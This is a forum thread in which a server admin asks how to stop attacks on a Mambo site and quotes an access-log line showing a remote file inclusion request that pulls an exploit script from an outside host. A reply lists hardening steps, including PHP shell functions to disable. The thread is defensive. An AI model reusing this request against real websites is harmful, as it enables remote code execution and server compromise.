from time to time I see this on some servers, but have not yet found a good way to prevent this, anyone here who can help maybe?
The problem is:
1. I find files like bot.txt, bnc.txt cmdtemp and the likes in /tmp directory.
2. Investigating how they came there shows me ie.:
[01/Sep/2006:06:29:55 +0200] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=http://www.exploits.pop.com.br/xpl.png?&cmd=id HTTP/1.0" 200 46 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
The scripts these to are calling are the attached files.
<removed, no point to making it easier>
I know I could just stop using mambo, and stop using coppermind, but I don`t want to do that. Is there another solution to stop bad people uploading files to /tmp? (it is secured with noexec, but it still allows the bad guys to run their scripts..)
I`m running CentOS and Directadmin if that means anything.
update your CMS!
and -x /tmp
php safemode ON
disable php funstions: system,passthru,exec,popen,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,fpassthru
and also sockets if you not need.